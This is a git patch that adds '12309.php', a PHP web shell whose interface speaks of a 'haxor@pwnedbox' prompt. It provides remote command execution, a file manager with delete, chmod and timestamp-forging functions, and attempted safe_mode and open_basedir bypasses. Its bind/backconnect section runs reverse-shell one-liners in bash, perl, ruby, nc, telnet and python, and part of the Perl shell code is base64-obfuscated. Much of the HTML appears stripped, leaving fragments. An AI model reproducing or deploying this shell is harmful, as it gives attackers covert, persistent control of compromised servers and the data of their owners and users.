From 8cfa36ee9dcacb21eb12893ce940ddcc88f5d4d3 Mon Sep 17 00:00:00 2001 From: Ario Date: Sun, 18 May 2014 22:24:07 +0800 Subject: [PATCH] add 12309.php --- php/12309.php | 2066 +++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 2066 insertions(+) create mode 100644 php/12309.php diff --git a/php/12309.php b/php/12309.php new file mode 100644 index 00000000..3b50853f --- /dev/null +++ b/php/12309.php @@ -0,0 +1,2066 @@ +'; +$htaccesses=array('cgi' => "Options +Indexes +FollowSymLinks +ExecCGI\nAddType application/x-httpd-cgi .pl .py", 'ssi' => "Options +Includes\nAddType text/html .shtml\nAddHandler server-parsed .shtml\nAddOutputFilter INCLUDES .shtml"); +if($_POST['action']!="") { + $_SESSION['action']=$_POST['action']; + $action=$_SESSION['action']; +} else { + $action="viewer"; +} +// download file or command execution result +if($action=="download" or $_POST["down"]=="on") { + $download="1"; +} +if ($download == "1") { + if (isset($_POST["file"])) { + header('Content-Length:'.filesize($_POST["file"]).''); + } + header("Content-Type: application/force-download"); + header("Content-Type: application/octet-stream"); + header("Accept-Ranges: bytes"); + if (isset($_POST["filename"])) { + header('Content-Disposition: attachment; filename="'.$_POST["filename"].'"'); + } elseif (isset($_POST["file"])) { + header('Content-Disposition: attachment; filename="'.$_POST["file"].'"'); + } else { + header('Content-Disposition: attachment; filename="result.txt"'); + } +} +@set_magic_quotes_runtime(0); +@ini_set("magic_quotes_runtime", 0); +// slashes fix by r00nix +if (get_magic_quotes_gpc()) { + function stripslashes_deep($value) { + $value = is_array($value) ? + array_map('stripslashes_deep', $value) : + stripslashes($value); + return $value; + } + $_POST = array_map('stripslashes_deep', $_POST); + $_GET = array_map('stripslashes_deep', $_GET); + $_COOKIE = array_map('stripslashes_deep', $_COOKIE); + $_REQUEST = array_map('stripslashes_deep', $_REQUEST); +} +$descriptorspec = array( + 0 => array("pipe", "r"), + 1 => array("pipe", "w"), + 2 => array("pipe", "w") +); +$helpscript='function showTooltip(id) +{ + var myDiv = document.getElementById(id); + if(myDiv.style.display == "none"){ + myDiv.style.display = "block"; + } else { + myDiv.style.display = "none"; + } + return false; +}'; +$resizescript='function changeSize(elem){ + if(event.keyCode==13){ + elem.rows = elem.rows+1; + } + var oldrows = getrows(elem); + var myTxtAreaSize = elem.value.length; + var newrows = (myTxtAreaSize / 80 | 0)+1; + if(newrows>oldrows){ + elem.rows = newrows; + } else { + elem.rows = oldrows; + } +} +function getrows(elem){ + var text = elem.value.replace(/\s+$/g, "\n"); + var aNewlines = text.split("\n"); + var iNewlineCount = aNewlines.length; + return iNewlineCount; +}'; +$design='function cleard() { + document.cookie="d=c; path=/;"; + window.location.reload(); +} +function blackd() { + document.cookie="d=b; path=/;"; + window.location.reload(); +}'; +if ($_COOKIE['d'] != "c") { + $style=''; +} else { + $style=''; +} +if ($_COOKIE['d'] == "c") { + $button='

'; + } else { + $button='

'; +} +$title=' + + + + 12309 '.$ver.' + '.$style.'
file operations || execute command || bind/backconnect || extras
'.$button.''; +// --------------------------------------------- symbolic permissions +function fperms($file,$request) { + $perms = fileperms($file); + if (($perms & 0xC000) == 0xC000) {$info = 's';} + elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} + elseif (($perms & 0x8000) == 0x8000) {$info = '-';} + elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} + elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} + elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} + elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} + else {$info = '?';} + if ($request == "string") { + $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); + $info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); + $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); + return $info; + } elseif ($request == "array") { + $o["r"] = ($perms & 00400) > 0; $o["w"] = ($perms & 00200) > 0; $o["x"] = ($perms & 00100) > 0; + $g["r"] = ($perms & 00040) > 0; $g["w"] = ($perms & 00020) > 0; $g["x"] = ($perms & 00010) > 0; + $w["r"] = ($perms & 00004) > 0; $w["w"] = ($perms & 00002) > 0; $w["x"] = ($perms & 00001) > 0; + return array("t"=>$info,"o"=>$o,"g"=>$g,"w"=>$w); + } else { + return "request?"; + } +} +function view_perms_color($file) { + if (!is_readable($file)) { + return "".fperms($file,"string").""; + } elseif (!is_writable($file)) { + return "".fperms($file,"string").""; + } else { + return "".fperms($file,"string").""; + } +} +// --------------------------------------------- touch file +function touchz($file) { + $form=TRUE; + if (isset($_POST["touch_submit"])) { + $date=explode(" ",$_POST["time"]); + $day=explode("-",$date[0]); + $time=explode(":",$date[1]); + $unixtime=mktime($time[0],$time[1],$time[2],$day[1],$day[2],$day[0]); + if (touch($file,$unixtime,$unixtime)) { + $form = FALSE; + echo "
touched ".$file." to ".$unixtime." (".$_POST["time"].") back

"; + } else { + echo "
can't touch to ".$unixtime." (".$_POST["time"].")! back

"; + } + } + if ($form) { + echo "
+ + + + + touch ".$file." to: + +
"; + } + return TRUE; +} +// --------------------------------------------- chmod code from c99 shell, updated by 12309 +function chmodz($file) { + $check = fileperms($file); + if (!$check) {echo "chmod error: can`t get current value!";} + else { + $form=TRUE; + if (isset($_POST["chmod_submit"])) { + $chmod_o=$_POST["chmod_o"]; + $chmod_g=$_POST["chmod_g"]; + $chmod_w=$_POST["chmod_w"]; + $octet=trim("0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8)); + if (chmod($file,octdec($octet))) { + $form = FALSE; + echo "chmoded ".$file." to ".$octet."! back

"; + } else { + echo "can't chmod to ".$octet."! back

"; + } + } + if (isset($_POST["chmod_string"])) { + if (chmod($file,octdec($_POST["string"]))) { + $form = FALSE; + echo "chmoded ".$file." to ".$_POST["string"]."! back

"; + } else { + echo "can't chmod to ".$_POST["string"]."! back

"; + } + } + if ($form) { + $perms = fperms($file,"array"); + echo "
chmoding ".$file.": ".view_perms_color($file)." (".substr(decoct($check),-4,4).") owned by:
".owner($file)."
+
input string:
+ + + + + +
"; + echo "
or select checkboxes:
+ + + + + + + + + + + +
Owner
+ read
+ write
+ execute +
Group
+ read
+ write
+ execute +
World
+ read
+ write
+ execute +
"; + } + } + return TRUE; +} +// --------------------------------------------- clearing phpversion() +function version() { + $pv=explode(".",phpversion()); + if(eregi("-",$pv[2])) { + $tmp=explode("-",$pv[2]); + $pv[2]=$tmp[0]; + } + $php_version_sort=$pv[0].".".$pv[1].".".$pv[2]; + return $php_version_sort; +} +// --------------------------------------------- recursive dir removal by Endeveit +function rmrf($dir) +{ + if ($objs = glob($dir."/*")) { + foreach($objs as $obj) { + is_dir($obj) ? rmrf($obj) : unlink($obj); + } + } + if (rmdir($dir)) { + return TRUE; + } else { + return FALSE; + } +} +// --------------------------------------------- checking for enabled funcs +function function_enabled($func) { + $disabled=explode(",",@ini_get("disable_functions")); + if (empty($disabled)) { + $disabled=array(); + } + else { + $disabled=array_map('trim',array_map('strtolower',$disabled)); + } + return (function_exists($func) && is_callable($func) && !in_array($func,$disabled) ); +} +if (!function_enabled('shell_exec') and !function_enabled('proc_open') and !function_enabled('passthru') and !function_enabled('system') and !function_enabled('exec') and !function_enabled('popen')) { + $failflag="1"; +} else { + $failflag="0"; +} +// -------------------------------------------- run command +function run($c) { + if (function_enabled('shell_exec')) { + shell_exec($c); + } else if(function_enabled('system')) { + system($c); + } else if(function_enabled('passthru')) { + passthru($c); + } else if(function_enabled('exec')) { + exec($c); + } else if(function_enabled('popen')) { + $fp=popen($c,'r'); + @pclose($fp); + } else if(function_enabled('proc_open')) { + $handle=proc_open($c,$GLOBALS["descriptorspec"],$pipes); + while (!feof($pipes[1])) { + $buffer.=fread($pipes[1],1024); + } + @proc_close($handle); + } +} +// -------------------------------------------- php <= 5.2.9 curl bug +function sploent529($path) { + if (!is_dir('file:')) { + mkdir('file:'); + } + $dirz=array(); + $a=array(); + $a=explode('/',$path); + $c=count($a); + $dir='file:/'; + $d=substr($dir,0,-1); + if (!is_dir($d)) { + mkdir($d); + } + for ($i=0;$i<$c-1;++$i) { + $dir.=$a[$i].'/'; + $d=substr($dir,0,-1); + $dirz[]=$d; + if (!is_dir($d)) { + mkdir($d); + } + } + if (!file_exists($path)) { + $fp=fopen('file:/'.$path,'w'); + fclose($fp); + } + $ch=curl_init(); + curl_setopt($ch,CURLOPT_URL,'file:file:////'.$path); + curl_setopt($ch,CURLOPT_HEADER,0); + if(FALSE==curl_exec($ch)) { + echo (" fail :( either there is no such file or exploit failed "); + curl_close($ch); + rmrf('file:'); + echo $pageend; + die(); + } else { + curl_close($ch); + rmrf('file:'); + return TRUE; + } +} +// --------------------------------------------- php 5.1.6 ini_set bug +function sploent516() { + //safe_mode check + if (ini_get("safe_mode") =="1" || ini_get("safe_mode") =="On" || ini_get("safe_mode") ==TRUE) { + ini_restore("safe_mode"); + if (ini_get("safe_mode") =="1" || ini_get("safe_mode") =="On" || ini_get("safe_mode") ==TRUE) { + ini_set("safe_mode", FALSE); + ini_set("safe_mode", "Off"); + ini_set("safe_mode", "0"); + if (ini_get("safe_mode") =="1" || ini_get("safe_mode") =="On" || ini_get("safe_mode") ==TRUE) { + echo "safe mode: ON
"; + } else { + echo "safe mode: OFF || hello php-5.1.6 bugs
"; + } + } else { + echo "safe mode: OFF || hello php-5.1.6 bugs
"; + } + } else { + echo "safe mode: OFF
"; + } + //open_basedir check + if (ini_get("open_basedir")=="Off" || ini_get("open_basedir")=="/" || ini_get("open_basedir")==NULL || strtolower(ini_get("open_basedir"))=="none") { + echo "open_basedir: none
"; + } + else { + ini_restore("open_basedir"); + if (ini_get("open_basedir")=="Off" || ini_get("open_basedir")=="/" || ini_get("open_basedir")==NULL || strtolower(ini_get("open_basedir"))=="none") { + echo "open_basedir: none || hello php-5.1.6 bugs
"; + } + else { + ini_set('open_basedir', '/'); + if (ini_get("open_basedir")=="/") { + echo "open_basedir: / || hello php-5.1.6 bugs
"; + } + else { + $basedir=TRUE; + echo "open_basedir: ".ini_get("open_basedir"); + } + } + } +} +// --------------------------------------------- findsock +function findsock($path) { + $VERSION = "1.0"; + echo "findsock start\n "; + $c="".$path." ".$_SERVER['REMOTE_ADDR']." ".$_SERVER['REMOTE_PORT'].""; + run($c); + echo " exiting\n"; + exit(); +} +// --------------------------------------------- search for binary +function search($bin,$flag) { + if ($flag=="1") { + $path=""; + return $path; + } else { + if (function_enabled('shell_exec')) { + $path=trim(shell_exec('export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin; which '.$bin.' 2>&1 | grep -v no.'.$bin.'.in')); + } else if(function_enabled('exec')) { + $path=trim(exec('export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin; which '.$bin.' 2>&1 | grep -v no.'.$bin.'.in')); + } else if(function_enabled('system')) { + ob_start(); + system('export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin; which '.$bin.' 2>&1 | grep -v no.'.$bin.'.in'); + $path=trim(ob_get_contents()); + ob_end_clean(); + } else if (function_enabled('popen')) { + $hndl=popen('export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin; which '.$bin.' 2>&1 | grep -v no.'.$bin.'.in', "r"); + $path=trim(stream_get_contents($hndl)); + pclose($hndl); + } else if(function_enabled('passthru')) { + ob_start(); + passthru('export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin; which '.$bin.' 2>&1 | grep -v no.'.$bin.'.in'); + $path=trim(ob_get_contents()); + ob_end_clean(); + } else if(function_enabled('proc_open')) { + $c='export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin && which '.$bin.' 2>&1 | grep -v no.'.$bin.'.in'; + $process = proc_open('/bin/sh', $GLOBALS["descriptorspec"], $pipes); + if (is_resource($process)) { + fwrite($pipes[0],$c); + fclose($pipes[0]); + $path=trim(stream_get_contents($pipes[1])); + fclose($pipes[1]); + fclose($pipes[2]); + @proc_close($process); + } + } + } + return $path; +} +// --------------------------------------------- filemanager code by Grinay, updated by 12309 +function owner($path) { + $user=fileowner($path); + $group=filegroup($path); + $data=$user; + if(function_enabled('posix_getpwuid')) { + $u=posix_getpwuid($user); + $data.=" (".$u["name"].")"; + } + $data.="
".$group; + if(function_enabled('posix_getgrgid')) { + $g=posix_getgrgid($group); + $data.=" (".$g["name"].") "; + } + return $data; +} +function view_size($size) { + if ($size>=1073741824) { $size=@round($size/1073741824*100)/100 ." GB"; } + elseif ($size>=1048576) { $size=$size." B
".@round($size/1048576*100)/100 ." MB"; } + elseif ($size>=1024) { $size=$size." B
".@round($size/1024*100)/100 ." KB"; } + else { $size=$size ." B"; } + return $size; +} +function dirsize($path) { + $totalsize=0; + if ($handle=opendir($path)) { + while (false !== ($file = readdir($handle))) { + $nextpath=$path . '/' . $file; + if ($file!='.' && $file != '..' && !is_link ($nextpath)) { + if (is_dir($nextpath)) { + $result=dirsize($nextpath); + $totalsize+=$result['size']; + } elseif (is_file($nextpath)) { + $totalsize+=filesize($nextpath); + } + } + } + } + closedir ($handle); + return $totalsize; +} +function scandire($dir) { + if (empty($dir)) { $dir=getcwd(); } + $dir=chdir($dir) or die('cannot chdir! open_basedir/safe_mode on?

'.$pageend.''); + $dir=getcwd()."/"; + $dir=str_replace("\\","/",$dir); + if (is_dir($dir)) { + if ($dh = opendir($dir)) { + while (($file = readdir($dh)) !== false) { + if(filetype($dir.$file)=="dir") $dire[]=$file; + if(filetype($dir.$file)=="file" || filetype($dir.$file)=="link" || filetype($dir.$file)=="socket") $files[]=$file; + // if(filetype($dir.$file)=="") $files[]=$file; //debug: strange behavior of filetype() with openbasedir, it returns "" + // if(filetype($dir.$file)=="link") $files[]=$file; + // echo "file = ".$file." (".filetype($file).")
"; #debug + // if (is_link($file)) { echo " -> ".readlink($file); }; #debug + } + closedir($dh); + @sort($dire); + @sort($files); + echo ""; + echo ''; + echo ""; + for($i=0;$i'; + } + for($i=0;$i'; + } + echo "
go to dir:
NameTypeSizeInode Changed
File Modified
File Accessed
Owner
Group
ChmodAction
'.$dire[$i].'Dir'.view_size(dirsize($link)).''.date("d/m/Y H:i:s",filectime($link)).'
'.date("d/m/Y H:i:s",filemtime($link)).'
'.date("d/m/Y H:i:s",fileatime($link)).'
'.owner($link).''.substr(sprintf('%o',fileperms($link)), -4).'
('.view_perms_color($link,"string").')
x C T
'.$files[$i].''; + echo '
File'.view_size(filesize($linkfile)).''.date("d/m/Y H:i:s",filectime($linkfile)).'
'.date("d/m/Y H:i:s",filemtime($linkfile)).'
'.date("d/m/Y H:i:s",fileatime($linkfile)).'
'.owner($linkfile).''.substr(sprintf('%o',fileperms($linkfile)), -4).'
('.view_perms_color($linkfile,"string").')
D E x C T
"; + } + } +} +// --------------------------------------------- crypt functions by Eugen +function entityenc($str) { + $text_array=explode("\r\n", chunk_split($str, 1)); + for ($n=0; $n < count($text_array) - 1; $n++) { + $newstring .= "&#" . ord($text_array[$n]) . ";"; + } + return $newstring; +} +function entitydec($str) { + $str=str_replace(';', '; ', $str); + $text_array=explode(' ', $str); + for ($n=0; $n < count($text_array) - 1; $n++) { + $newstring .= chr(substr($text_array[$n], 2, 3)); + } + return $newstring; +} +function asc2hex($str) { + return chunk_split(bin2hex($str), 2, " "); +} +function hex2asc($str) { + $str=str_replace(" ", "", $str); + for ($n=0; $n>6) & 0x3f}; + ++$i; + if ($i >= $count) break; + if ($i < $count) $value |= (ord($input[$i]) << 16); + $output .= $itoa64{($value>>12) & 0x3f}; + ++$i; + if ($i >= $count) break; + $output .= $itoa64{($value>>18) & 0x3f}; + } + return $output; +} +function to64na($value,$num) { + global $itoa64; + $output = ''; + while ($num-1 >= 0) { + --$num; + $output .= $itoa64{$value & 0x3f}; + $value >>= 6; + } + return $output; +} +function unap($pwd,$salt,$magic='$1$') { + if (substr($salt,0,strlen($magic)) == $magic) $salt = substr($salt,strlen($magic)); + $salt = explode('$',$salt,1); + $salt = substr($salt[0],0,8); + $ctx = $pwd.$magic.$salt; + $final = md5($pwd.$salt.$pwd,true); + for ($pl=strlen($pwd);$pl>=0;$pl-=16) { + $ctx .= substr($final,0,($pl>16?16:$pl)); + } + $i = strlen($pwd); + while ($i) { + $ctx .= ($i&1?chr(0):$pwd{0}); + $i >>= 1; + } + $final = md5($ctx,true); + for ($i=0;$i<1000;++$i) { + $ctx1 = ''; + $ctx1 .= ($i&1?$pwd:substr($final,0,16)); + if ($i % 3) $ctx1 .= $salt; + if ($i % 7) $ctx1 .= $pwd; + $ctx1 .= ($i&1?substr($final,0,16):$pwd); + $final = md5($ctx1,true); + } + $passwd = ''; + $passwd .= to64na(((int)ord($final{0}) << 16)|((int)ord($final{6}) << 8)|((int)ord($final{12})),4); + $passwd .= to64na(((int)ord($final{1}) << 16)|((int)ord($final{7}) << 8)|((int)ord($final{13})),4); + $passwd .= to64na(((int)ord($final{2}) << 16)|((int)ord($final{8}) << 8)|((int)ord($final{14})),4); + $passwd .= to64na(((int)ord($final{3}) << 16)|((int)ord($final{9}) << 8)|((int)ord($final{15})),4); + $passwd .= to64na(((int)ord($final{4}) << 16)|((int)ord($final{10}) << 8)|((int)ord($final{5})),4); + $passwd .= to64na(((int)ord($final{11})),2); + return $magic.$salt.'$'.$passwd; +} +function phpass($pwd,$salt,$count,$prefix) { + $hash = md5($salt.$pwd,true); + for ($i=0;$i<$count;++$i) { + $hash = md5($hash.$pwd,true); + } + return $prefix.substr($salt,0,8).to64as($hash,16); +} +function genSalt($salt,$length=8,$dot=0) { + if (strlen($salt)>=$length) return substr($salt,0,$length); + global $itoa64; + if (!$dot) { $alphabet=substr($itoa64,2); } else { $alphabet=$itoa64; } + $output=''; + for ($i=0;$i<$length;++$i) $output.=$alphabet{mt_rand(0,strlen($alphabet)-1)}; + return $output; +} +function mysql4($pwd) { + $nr = 0x50305735; + $nr2 = 0x12345671; + $add = 7; + $charArr = str_split($pwd); + foreach ($charArr as $char) { + if (in_array($char,array(' ','\n'))) continue; + $charVal = ord($char); + $nr ^= ((($nr & 63)+$add) * $charVal)+($nr << 8); + $nr &= 0x7fffffff; + $nr2 += ($nr2 << 8) ^ $nr; + $nr2 &= 0x7fffffff; + $add += $charVal; + } + return sprintf('%08x%08x',$nr,$nr2); +} +// --------------------------------------------- main code +if (!isset($_REQUEST['p'])) { $_REQUEST['p']="s"; } +switch ($_REQUEST['p']) { + case "s": + if (empty($_POST["wut"]) and $download != "1") { + echo $title; + sploent516(); + if (ini_get("safe_mode")) { + $failflag="1"; + } + $shelltext=("uname -a"); + echo '
+ haxor@pwnedbox$ download

'; + if ($failflag=="1") { + echo "all system functions are disabled :( but you could try a CGI/SSI shell ;) and still there is
"; } else { + if (function_enabled('passthru')) { + echo 'passthru
'; + } else { echo 'passthru is disabled!
';} + if (function_enabled('system')) { + echo 'system
'; + } else { echo 'system is disabled!
';} + if (function_enabled('exec')) { + echo 'exec
'; + } else { echo 'exec is disabled!
';} + if (function_enabled('shell_exec')) { + echo 'shell_exec
'; + } else { echo 'shell_exec is disabled!
';} + if (function_enabled('popen')) { + echo 'popen
'; + } else { echo 'popen is disabled!
';} + if (function_enabled('proc_open')) { + echo 'proc_open
'; + } else { echo 'proc_open is disabled!
';} + } + // eval almost always enabled, except there is special option in suhosin-patched php + echo 'php eval()
'; + echo '
'; + echo "
pcntl_exec:"; + //determining if pcntl enabled is kinda tricky. debug: add if(dl('pcntl.so')) or check var_dump(get_extension_funcs('pcntl')) ? + if (extension_loaded('pcntl')) { + if (function_enabled('pcntl_fork')) { + if (function_enabled('pcntl_exec')) { + echo '
interpreter
haxor@pwnedbox$ > >> '; + if (is_writable("./")) { + echo "(./ writable)"; + } else { + echo "(./ readonly)"; + } + echo '
delete result file after showing contents download
'; + } else { + echo "
pcntl_exec is disabled!
"; + } + } else { + echo "
pcntl_fork is disabled!
"; + } + } else { + echo "
fail, no pcntl.so here
"; + } + echo "
ssh2_exec:"; + if (extension_loaded('ssh2')) { + if (function_enabled('ssh2_connect')) { + if (function_enabled('ssh2_exec')) { + if ($download != "1") { + if (empty($_POST["wut"])) { + echo '
host: port: user: password:
haxor@pwnedbox$ download
'; + } + } + } else { + echo "
ssh2_exec is disabled!"; + } + } else { + echo "
ssh2_connect is disabled!"; + } + } else { + echo "
fail, no ssh2.so here"; + } + echo $pageend; + } else { + if ($download != "1") { + echo $title; + } + $shelltext=$_POST["command"]; + $html='
haxor@pwnedbox$ '; + $input=' 2>&1 download
'; + break; + case "system": + if (strnatcmp(version(),"5.2.9") <= 0) { + sploent516(); + } + echo "$html"; echo "$input"; echo 'system">'; + break; + case "exec": + if (strnatcmp(version(),"5.2.9") <= 0) { + sploent516(); + } + echo "$html"; echo "$input"; echo 'exec">'; + break; + case "shell_exec": + if (strnatcmp(version(),"5.2.9") <= 0) { + sploent516(); + } + echo "$html"; echo "$input"; echo 'shell_exec">'; + break; + case "popen": + if (strnatcmp(version(),"5.2.9") <= 0) { + sploent516(); + } + echo "$html"; echo "$input"; echo 'popen">'; + break; + case "proc_open": + if (strnatcmp(version(),"5.2.9") <= 0) { + sploent516(); + } + echo "$html"; echo "$input"; echo 'proc_open">'; + break; + case "eval": + if (strnatcmp(version(),"5.2.9") <= 0) { + sploent516(); + } + echo "$html"; echo 'php -r \''; echo ' \' + '; + break; + case "pcntl": + //sploent516 not needed coz pcntl bypasses safe_mode + echo '
interpreter
haxor@pwnedbox$ > >> '; + if (is_writable("./")) { + echo "(./ writable)"; + } else { + echo "(./ readonly)"; + } + echo '
delete result file after showing contents download
'; + break; + case "ssh2": + echo '
host: port: user: password:
haxor@pwnedbox$ download
'; + break; + } + } + } + if (!empty($_POST["wut"])) { + if ($download != "1") { + echo ""; + } + } + break; +// --------------------------------------------- shell end; file operations + case "f": + if ($download != "1") { + echo $title; + echo ""; + echo "current dir: ".getcwd()."
"; + sploent516(); + echo "
--------------------------------
"; + } + if (empty($_POST["filer"]) and $download != "1" and empty($_POST["edt"]) and empty($_POST["sqlr"]) and empty($_POST["sqlu"]) and empty($_POST["upload"])) { + echo ' >> read/upload/edit file <<

+ ---> fail manager
'; + } + if ($action=="viewer") { + if (!isset($dir)) { + $dir=getcwd(); + } + scandire($_POST["dir"]); + } + if ($action=="download") { + readfile($_POST["file"]); + } + if ($action=="chmod") { + chmodz($_POST["file"]); + } + if ($action=="touch") { + touchz($_POST["file"]); + } + if ($action == 'delete') { + if (unlink($_POST["file"])) $content.="file ".$_POST["file"]." deleted, back"; + } + if ($action == 'deletedir') { + if (!rmrf($_POST["file"])) { + $content .="error deleting dir ".$_POST["file"].", back"; + } else { + $content .="dir ".$_POST["file"]." deleted, back"; + } + } + if (!empty($content)) { + echo $content; + } + if ($download != "1") { + echo '
'; + echo '
'; + echo $pageend; + } + break; +// --------------------------------------------- file operations end; bind + case "b": + echo $title; + echo ' >> help << +

'; + if ($failflag=="1") { + echo "fail, at least one system function needed!

"; + } else { + $nc='(dont forget to setup nc first!)'; + $semi='dont forget to write ; at the end of command!'; + sploent516(); + echo "
"; //debug: sometimes page cut here, when passthru system shell_exec are disabled + echo ' - - - - = = = = > > one-liners
>> show code << +
'; + echo '
backconnect to : using
'; + $searchvar=trim(search("bash",$failflag)); + if (empty($searchvar)) { + echo "fail, no bash here (lolwut?)
"; + } else { + echo ' bash
'; + } + $searchvar=trim(search("perl",$failflag)); + if (empty($searchvar)) { + echo "fail, no perl here
"; + } else { + echo ' perl
'; + } + $searchvar=trim(search("ruby",$failflag)); + if (empty($searchvar)) { + echo "fail, no ruby here
"; + } else { + echo ' ruby
'; + } + $searchvar=trim(search("nc",$failflag)); + if (empty($searchvar)) { + echo "fail, no nc here
"; + } else { + echo ' nc
'; + } + $searchvar=trim(search("telnet",$failflag)); + if (empty($searchvar)) { + echo "fail, no telnet here
"; + } else { + echo ' telnet
'; + } + $searchvar=trim(search("python",$failflag)); + if (empty($searchvar)) { + echo "fail, no python here
"; + } else { + echo ' python
'; + } + echo '

'; + if (!empty($_POST["oneline"])) { + switch ($_POST["wut"]) { + case "bash": + $c='0<&123;exec 123<>/dev/tcp/'.$_POST["ip"].'/'.$_POST["port"].'; sh <&123 >&123 2>&123'; + run($c); + echo "done
"; + break; + case "perl": + $c='perl -MIO -e \'$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"'.$_POST['ip'].':'.$_POST['port'].'");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;\''; + run($c); + echo "done
"; + break; + case "ruby": + $c='ruby -rsocket -e \'exit if fork;c=TCPSocket.new("'.$_POST['ip'].'","'.$_POST['port'].'");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end\''; + run($c); + echo "done
"; + break; + case "nc": + $c='rm -f /tmp/.ncnd; mknod /tmp/.ncnd p && nc '.$_POST['ip'].' '.$_POST['port'].' 0/tmp/.ncnd 2>&1'; + run($c); + echo "done
"; + break; + case "telnet": + $c='rm -f /tmp/.ncnd; mknod /tmp/.ncnd p && telnet '.$_POST['ip'].' '.$_POST['port'].' 0/tmp/.ncnd 2>&1'; + run($c); + echo "done
"; + break; + case "python": + $c='python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("'.$_POST['ip'].'",'.$_POST['port'].'));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\''; + run($c); + echo "done
"; + break; + } + } + echo '- - - - = = = = > > classic
'; + echo '---> PHP
'; + if (!function_enabled('set_time_limit')) { echo 'warning! set_time_limit off!
'; } + if (!function_enabled('ignore_user_abort')) { echo 'warning! ignore_user_abort off!
'; } + echo '
bind local port
'.$semi.'
'; + if (function_enabled('fsockopen')) { + if (function_enabled('proc_open')) { + echo '
backconnect to :
'.$nc.'

'; + } else { echo 'fail, proc_open is needed for backconnect!

'; } + } else { echo 'fail, fsockopen is needed for backconnect!

'; } + //php end + echo '---> PERL
'; + $searchvar=trim(search("perl",$failflag)); + if (empty($searchvar)) { + echo "fail, no perl here
"; + } else { + echo '
bind local port saving file to '; + if (is_writable("./")) { + echo "(./ writable)"; + } else { + echo "(./ readonly)"; + } + echo '
'.$semi.'
'; + echo '
backconnect to : saving file to
'.$nc.'
'; + } + //perl end + echo "
"; + echo '---> PYTHON
'; + $searchvar=trim(search("python",$failflag)); + if (empty($searchvar)) { + echo "fail, no python here
"; + } else { + echo '
bind local port saving file to '; + if (is_writable("./")) { + echo "(./ writable)"; + } else { + echo "(./ readonly)"; + } + echo '
'.$semi.'
'; + echo '
backconnect to : saving file to
'.$nc.'
'; + echo '
fully interactive backconnect to : saving file to
'; + echo 'you need to run special client first: >> show code <<
with this one you will be able to run mc, top, vim, etc
+
'; + } + //python end + echo "
"; + echo '---> C
'; + $searchvar=trim(search("gcc",$failflag)); + if (empty($searchvar)) { + echo "fail, no gcc here
"; + } else { + echo 'don\'t remove ".c" file extension! compiler= '.$searchvar.'
'; + echo '
bind local port saving file to '; + if (is_writable("./")) { + echo "(./ writable)"; + } else { + echo "(./ readonly)"; + } + echo '
'.$semi.'
'; + echo '
backconnect to : saving file to
'.$nc.'
'; + } + //c end + echo "
"; + echo '---> PHP+C findsock (likely wont work on modern php&apache >= 2009)
'; + $searchvar=trim(search("gcc",$failflag)); + if (empty($searchvar)) { + echo "fail, no gcc here
"; + } else { + echo '
compile findsock saving binary to: >> help << '; + echo '"; + echo '


'; + } + } //failcheck end + if (!empty($_POST["shellz"])) { + //code by security-teams.net + $perlbdcode='#!'.search("perl",$failflag).' + use IO::Socket::INET; + $server = IO::Socket::INET->new( + LocalPort => '.$_POST["port"].','; + $perlbdcode.=gzinflate(base64_decode('bY/RCoIwFIbve4rjiJhhSNemEGYQpYIadBFE6RFHpuKsiPDdc6ZB1C7G9n3/OdsBECt4FNgeQDfAd831wQ88a24rgzf18Mqx99OebhivMPtU2fOd6TrOW8qQlxAxpGR5ZClG0j4jsibcPWnudCyioMOQY3nDcmIcwxCLisqyyDzbJiymUpyX5w52FPKiedQPFitHASCzkehEtG/nbgMFiPHXWZ734/ijGeVCiXpimcqT7qtQt3uY5s30It7SevAC')); + //code by Michael Schierl + $perlbccode='#!'.search("perl",$failflag); + $perlbccode.="\n"; + 